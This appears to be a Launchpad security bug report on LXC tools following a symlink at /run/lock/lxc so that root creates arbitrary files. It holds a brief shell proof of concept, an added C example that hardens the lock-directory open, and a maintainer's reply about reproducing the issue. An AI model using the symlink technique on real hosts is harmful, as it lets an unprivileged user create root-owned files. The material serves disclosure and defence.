lxc tools lock handling vulnerable to symlink attack
| Affects | Status | Importance | Assigned to | Milestone |
|---|---|---|---|---|
| lxc (Ubuntu) | Fix Released | Undecided | Unassigned | |
Bug Description
During an LXC security analysis (see [1]) it was found that when LXC tools such as lxc-info are run as root, a symlink attack on /run/lock/lxc can be used to create arbitrary files as the root user. The malicious user has to set up the symlink before /run/lock/lxc/ exists, which is only possible before the administrator creates the first container, or before automatic startup brings one up after boot.
PoC:

```text
$ mkdir -p /run/lock/
$ ln -s /test /run/lock/
$ stat /test
stat: cannot stat ‘/test’: No such file or directory
$ sudo lxc-create --name somename --template download # An admin would run this command
...
Distribution: ubuntu
Release: trusty
Architecture: amd64
...
$ stat /test
  File: ‘/test’
  Size: 0         Blocks: 0          IO Block: 4096   regular empty file
Device: fd01h/64769d    Inode: 52559       Links: 1
Access: (0600/-rw-------)  Uid: (    0/    root)   Gid: (    0/    root)
Access: 2015-07-02 10:40:55.703646793 -0500
Modify: 2015-07-02 10:40:55.703646793 -0500
Change: 2015-07-02 10:40:55.703646793 -0500
 Birth: -
# lsb_release -rd
Description: Ubuntu 14.04.2 LTS
Release: 14.04
# apt-cache policy lxc
lxc:
  Installed: 1.0.7-0ubuntu0.1
  Candidate: 1.0.7-0ubuntu0.1
  Version table:
 *** 1.0.7-0ubuntu0.1 0
        500 http://
        100 /var/lib/
     1.0.3-0ubuntu3 0
        500 http://
```
[1] https:/
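One defensive pattern against the lock-directory symlink attack described above, as an added example that is not lxc's own fix: create the directory, then open it with O_NOFOLLOW|O_DIRECTORY, verify ownership with fstat(), and create the per-container lock file with openat() relative to that descriptor so the path cannot be redirected afterwards. The demo function plants a dangling symlink in a constructed temporary directory (standing in for /run/lock/lxc) and checks that the hardened open refuses it; all paths and names are constructed for the demo.

```c
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Open (creating it if absent) a lock directory without following a symlink
 * planted at that path. Returns a directory fd, or -1 with errno set. */
int open_lockdir_nofollow(const char *path, mode_t mode)
{
    if (mkdir(path, mode) < 0 && errno != EEXIST) return -1;
    /* O_NOFOLLOW gives ELOOP on a symlink, O_DIRECTORY ENOTDIR on a file. */
    int fd = open(path, O_RDONLY | O_DIRECTORY | O_NOFOLLOW | O_CLOEXEC);
    if (fd < 0) return -1;
    struct stat st;  /* must be owned by us and not world-writable */
    if (fstat(fd, &st) < 0 || st.st_uid != geteuid() || (st.st_mode & S_IWOTH)) {
        close(fd); errno = EPERM; return -1;
    }
    return fd;
}

/* Create the lock file relative to the verified directory fd, so resolution
 * cannot be redirected between the check above and the create. */
int create_lockfile_at(int dirfd, const char *name)
{
    return openat(dirfd, name, O_CREAT | O_RDWR | O_NOFOLLOW | O_CLOEXEC, 0600);
}

/* Demo on constructed paths in a temp dir: plant a dangling symlink "lock" ->
 * "<tmp>/victim" (as the PoC plants /run/lock/lxc); the hardened open must
 * refuse it, "victim" must not appear, a real dir must still work. 1 = ok. */
int demo_symlink_rejected(void)
{
    char base[] = "/tmp/lockdemoXXXXXX", link[256], victim[256], good[256];
    if (!mkdtemp(base)) return 0;
    snprintf(link, sizeof link, "%s/lock", base);
    snprintf(victim, sizeof victim, "%s/victim", base);
    snprintf(good, sizeof good, "%s/lock-ok", base);
    if (symlink(victim, link) < 0) return 0;
    int ok = 1, fd = open_lockdir_nofollow(link, 0700);
    if (fd >= 0) { close(fd); ok = 0; }          /* must fail with ELOOP */
    if (access(victim, F_OK) == 0) ok = 0;       /* nothing written through it */
    fd = open_lockdir_nofollow(good, 0700);
    int lfd = fd < 0 ? -1 : create_lockfile_at(fd, "somename");
    if (lfd < 0) ok = 0; else { close(lfd); unlinkat(fd, "somename", 0); }
    if (fd >= 0) close(fd); rmdir(good); unlink(link); rmdir(base);
    return ok;
}
```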
CVE References
description: updated
information type: Private Security → Public Security
Hi Roman - Thank you for the report!
Unfortunately, I'm having trouble reproducing the issue. You say that guest "somename" has to exist, but if a privileged LXC container has been created, /run/lock/lxc always exists. That directory and its subdirectories are only modifiable by root and they're created during the boot process.
I'll now try creating the malicious /run/lock/lxc/var/lib/lxc/somename before creating the "somename" container since /run/lock/lxc will not yet exist.